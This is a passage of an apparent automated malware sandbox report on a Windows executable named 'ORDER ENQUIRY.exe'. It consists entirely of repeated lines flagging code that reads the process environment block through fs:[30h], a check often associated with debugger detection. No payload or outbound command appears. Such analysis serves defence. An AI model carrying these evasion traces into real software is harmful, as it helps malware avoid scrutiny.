Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B30283 mov eax, dword ptr fs:[00000030h]	3_2_01B30283
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B30283 mov eax, dword ptr fs:[00000030h]	3_2_01B30283
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC02E1 mov eax, dword ptr fs:[00000030h]	3_2_01AC02E1
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC02E1 mov eax, dword ptr fs:[00000030h]	3_2_01AC02E1
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC02E1 mov eax, dword ptr fs:[00000030h]	3_2_01AC02E1
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA2C3 mov eax, dword ptr fs:[00000030h]	3_2_01ABA2C3
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA2C3 mov eax, dword ptr fs:[00000030h]	3_2_01ABA2C3
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA2C3 mov eax, dword ptr fs:[00000030h]	3_2_01ABA2C3
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA2C3 mov eax, dword ptr fs:[00000030h]	3_2_01ABA2C3
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABA2C3 mov eax, dword ptr fs:[00000030h]	3_2_01ABA2C3
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B862D6 mov eax, dword ptr fs:[00000030h]	3_2_01B862D6
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AA823B mov eax, dword ptr fs:[00000030h]	3_2_01AA823B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AA826B mov eax, dword ptr fs:[00000030h]	3_2_01AA826B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]	3_2_01B60274
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]	3_2_01B60274
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]	3_2_01B60274
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]	3_2_01B60274
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]	3_2_01B60274
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]	3_2_01B60274
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]	3_2_01B60274
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]	3_2_01B60274
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]	3_2_01B60274
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]	3_2_01B60274
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]	3_2_01B60274
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]	3_2_01B60274
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB4260 mov eax, dword ptr fs:[00000030h]	3_2_01AB4260
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB4260 mov eax, dword ptr fs:[00000030h]	3_2_01AB4260
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB4260 mov eax, dword ptr fs:[00000030h]	3_2_01AB4260
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B8625D mov eax, dword ptr fs:[00000030h]	3_2_01B8625D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B6A250 mov eax, dword ptr fs:[00000030h]	3_2_01B6A250
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B6A250 mov eax, dword ptr fs:[00000030h]	3_2_01B6A250
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B38243 mov eax, dword ptr fs:[00000030h]	3_2_01B38243
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B38243 mov ecx, dword ptr fs:[00000030h]	3_2_01B38243
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB6259 mov eax, dword ptr fs:[00000030h]	3_2_01AB6259
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAA250 mov eax, dword ptr fs:[00000030h]	3_2_01AAA250
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B305A7 mov eax, dword ptr fs:[00000030h]	3_2_01B305A7
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B305A7 mov eax, dword ptr fs:[00000030h]	3_2_01B305A7
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B305A7 mov eax, dword ptr fs:[00000030h]	3_2_01B305A7
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD45B1 mov eax, dword ptr fs:[00000030h]	3_2_01AD45B1
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD45B1 mov eax, dword ptr fs:[00000030h]	3_2_01AD45B1
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE4588 mov eax, dword ptr fs:[00000030h]	3_2_01AE4588
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB2582 mov eax, dword ptr fs:[00000030h]	3_2_01AB2582
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB2582 mov ecx, dword ptr fs:[00000030h]	3_2_01AB2582
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEE59C mov eax, dword ptr fs:[00000030h]	3_2_01AEE59C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEC5ED mov eax, dword ptr fs:[00000030h]	3_2_01AEC5ED
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEC5ED mov eax, dword ptr fs:[00000030h]	3_2_01AEC5ED
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]	3_2_01ADE5E7
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]	3_2_01ADE5E7
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]	3_2_01ADE5E7
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]	3_2_01ADE5E7
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]	3_2_01ADE5E7
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]	3_2_01ADE5E7
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]	3_2_01ADE5E7
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]	3_2_01ADE5E7
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB25E0 mov eax, dword ptr fs:[00000030h]	3_2_01AB25E0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEE5CF mov eax, dword ptr fs:[00000030h]	3_2_01AEE5CF
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEE5CF mov eax, dword ptr fs:[00000030h]	3_2_01AEE5CF
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB65D0 mov eax, dword ptr fs:[00000030h]	3_2_01AB65D0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEA5D0 mov eax, dword ptr fs:[00000030h]	3_2_01AEA5D0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEA5D0 mov eax, dword ptr fs:[00000030h]	3_2_01AEA5D0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADE53E mov eax, dword ptr fs:[00000030h]	3_2_01ADE53E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADE53E mov eax, dword ptr fs:[00000030h]	3_2_01ADE53E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADE53E mov eax, dword ptr fs:[00000030h]	3_2_01ADE53E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADE53E mov eax, dword ptr fs:[00000030h]	3_2_01ADE53E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADE53E mov eax, dword ptr fs:[00000030h]	3_2_01ADE53E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]	3_2_01AC0535
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]	3_2_01AC0535
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]	3_2_01AC0535
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]	3_2_01AC0535
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]	3_2_01AC0535
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]	3_2_01AC0535
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B46500 mov eax, dword ptr fs:[00000030h]	3_2_01B46500
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]	3_2_01B84500
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]	3_2_01B84500
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]	3_2_01B84500
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]	3_2_01B84500
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]	3_2_01B84500
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]	3_2_01B84500
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]	3_2_01B84500
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE656A mov eax, dword ptr fs:[00000030h]	3_2_01AE656A
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE656A mov eax, dword ptr fs:[00000030h]	3_2_01AE656A
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE656A mov eax, dword ptr fs:[00000030h]	3_2_01AE656A
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB8550 mov eax, dword ptr fs:[00000030h]	3_2_01AB8550
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB8550 mov eax, dword ptr fs:[00000030h]	3_2_01AB8550
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB64AB mov eax, dword ptr fs:[00000030h]	3_2_01AB64AB
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3A4B0 mov eax, dword ptr fs:[00000030h]	3_2_01B3A4B0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE44B0 mov ecx, dword ptr fs:[00000030h]	3_2_01AE44B0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B6A49A mov eax, dword ptr fs:[00000030h]	3_2_01B6A49A
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB04E5 mov ecx, dword ptr fs:[00000030h]	3_2_01AB04E5
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAE420 mov eax, dword ptr fs:[00000030h]	3_2_01AAE420
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAE420 mov eax, dword ptr fs:[00000030h]	3_2_01AAE420
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAE420 mov eax, dword ptr fs:[00000030h]	3_2_01AAE420
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAC427 mov eax, dword ptr fs:[00000030h]	3_2_01AAC427
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]	3_2_01B36420
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]	3_2_01B36420
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]	3_2_01B36420
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]	3_2_01B36420
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]	3_2_01B36420
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]	3_2_01B36420
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]	3_2_01B36420
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEA430 mov eax, dword ptr fs:[00000030h]	3_2_01AEA430
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE8402 mov eax, dword ptr fs:[00000030h]	3_2_01AE8402
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE8402 mov eax, dword ptr fs:[00000030h]	3_2_01AE8402
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE8402 mov eax, dword ptr fs:[00000030h]	3_2_01AE8402
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3C460 mov ecx, dword ptr fs:[00000030h]	3_2_01B3C460
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADA470 mov eax, dword ptr fs:[00000030h]	3_2_01ADA470
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADA470 mov eax, dword ptr fs:[00000030h]	3_2_01ADA470
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADA470 mov eax, dword ptr fs:[00000030h]	3_2_01ADA470
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B6A456 mov eax, dword ptr fs:[00000030h]	3_2_01B6A456
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]	3_2_01AEE443
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]	3_2_01AEE443
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]	3_2_01AEE443
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]	3_2_01AEE443
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]	3_2_01AEE443
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]	3_2_01AEE443
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]	3_2_01AEE443
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]	3_2_01AEE443
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AA645D mov eax, dword ptr fs:[00000030h]	3_2_01AA645D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD245A mov eax, dword ptr fs:[00000030h]	3_2_01AD245A
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB07AF mov eax, dword ptr fs:[00000030h]	3_2_01AB07AF
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B647A0 mov eax, dword ptr fs:[00000030h]	3_2_01B647A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5678E mov eax, dword ptr fs:[00000030h]	3_2_01B5678E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD27ED mov eax, dword ptr fs:[00000030h]	3_2_01AD27ED
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD27ED mov eax, dword ptr fs:[00000030h]	3_2_01AD27ED
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD27ED mov eax, dword ptr fs:[00000030h]	3_2_01AD27ED
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB47FB mov eax, dword ptr fs:[00000030h]	3_2_01AB47FB
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB47FB mov eax, dword ptr fs:[00000030h]	3_2_01AB47FB
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3E7E1 mov eax, dword ptr fs:[00000030h]	3_2_01B3E7E1
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABC7C0 mov eax, dword ptr fs:[00000030h]	3_2_01ABC7C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B307C3 mov eax, dword ptr fs:[00000030h]	3_2_01B307C3
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2C730 mov eax, dword ptr fs:[00000030h]	3_2_01B2C730
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEC720 mov eax, dword ptr fs:[00000030h]	3_2_01AEC720
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEC720 mov eax, dword ptr fs:[00000030h]	3_2_01AEC720
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE273C mov eax, dword ptr fs:[00000030h]	3_2_01AE273C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE273C mov ecx, dword ptr fs:[00000030h]	3_2_01AE273C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE273C mov eax, dword ptr fs:[00000030h]	3_2_01AE273C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEC700 mov eax, dword ptr fs:[00000030h]	3_2_01AEC700
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB0710 mov eax, dword ptr fs:[00000030h]	3_2_01AB0710
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE0710 mov eax, dword ptr fs:[00000030h]	3_2_01AE0710
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB8770 mov eax, dword ptr fs:[00000030h]	3_2_01AB8770
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]	3_2_01AC0770
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]	3_2_01AC0770
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]	3_2_01AC0770
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]	3_2_01AC0770
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]	3_2_01AC0770
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]	3_2_01AC0770
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]	3_2_01AC0770
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]	3_2_01AC0770
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]	3_2_01AC0770
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]	3_2_01AC0770
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]	3_2_01AC0770
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]	3_2_01AC0770
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE674D mov esi, dword ptr fs:[00000030h]	3_2_01AE674D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE674D mov eax, dword ptr fs:[00000030h]	3_2_01AE674D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE674D mov eax, dword ptr fs:[00000030h]	3_2_01AE674D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B34755 mov eax, dword ptr fs:[00000030h]	3_2_01B34755
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3E75D mov eax, dword ptr fs:[00000030h]	3_2_01B3E75D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB0750 mov eax, dword ptr fs:[00000030h]	3_2_01AB0750
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2750 mov eax, dword ptr fs:[00000030h]	3_2_01AF2750
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2750 mov eax, dword ptr fs:[00000030h]	3_2_01AF2750
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEC6A6 mov eax, dword ptr fs:[00000030h]	3_2_01AEC6A6
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE66B0 mov eax, dword ptr fs:[00000030h]	3_2_01AE66B0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB4690 mov eax, dword ptr fs:[00000030h]	3_2_01AB4690
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB4690 mov eax, dword ptr fs:[00000030h]	3_2_01AB4690
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2E6F2 mov eax, dword ptr fs:[00000030h]	3_2_01B2E6F2
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2E6F2 mov eax, dword ptr fs:[00000030h]	3_2_01B2E6F2
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2E6F2 mov eax, dword ptr fs:[00000030h]	3_2_01B2E6F2
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2E6F2 mov eax, dword ptr fs:[00000030h]	3_2_01B2E6F2
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B306F1 mov eax, dword ptr fs:[00000030h]	3_2_01B306F1
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B306F1 mov eax, dword ptr fs:[00000030h]	3_2_01B306F1
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEA6C7 mov ebx, dword ptr fs:[00000030h]	3_2_01AEA6C7
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEA6C7 mov eax, dword ptr fs:[00000030h]	3_2_01AEA6C7
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB262C mov eax, dword ptr fs:[00000030h]	3_2_01AB262C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ACE627 mov eax, dword ptr fs:[00000030h]	3_2_01ACE627
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE6620 mov eax, dword ptr fs:[00000030h]	3_2_01AE6620
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE8620 mov eax, dword ptr fs:[00000030h]	3_2_01AE8620
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]	3_2_01AC260B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]	3_2_01AC260B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]	3_2_01AC260B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]	3_2_01AC260B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]	3_2_01AC260B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]	3_2_01AC260B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]	3_2_01AC260B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF2619 mov eax, dword ptr fs:[00000030h]	3_2_01AF2619
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2E609 mov eax, dword ptr fs:[00000030h]	3_2_01B2E609
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEA660 mov eax, dword ptr fs:[00000030h]	3_2_01AEA660
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEA660 mov eax, dword ptr fs:[00000030h]	3_2_01AEA660
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7866E mov eax, dword ptr fs:[00000030h]	3_2_01B7866E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7866E mov eax, dword ptr fs:[00000030h]	3_2_01B7866E
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE2674 mov eax, dword ptr fs:[00000030h]	3_2_01AE2674
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ACC640 mov eax, dword ptr fs:[00000030h]	3_2_01ACC640
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B389B3 mov esi, dword ptr fs:[00000030h]	3_2_01B389B3
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B389B3 mov eax, dword ptr fs:[00000030h]	3_2_01B389B3
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B389B3 mov eax, dword ptr fs:[00000030h]	3_2_01B389B3
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB09AD mov eax, dword ptr fs:[00000030h]	3_2_01AB09AD
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB09AD mov eax, dword ptr fs:[00000030h]	3_2_01AB09AD
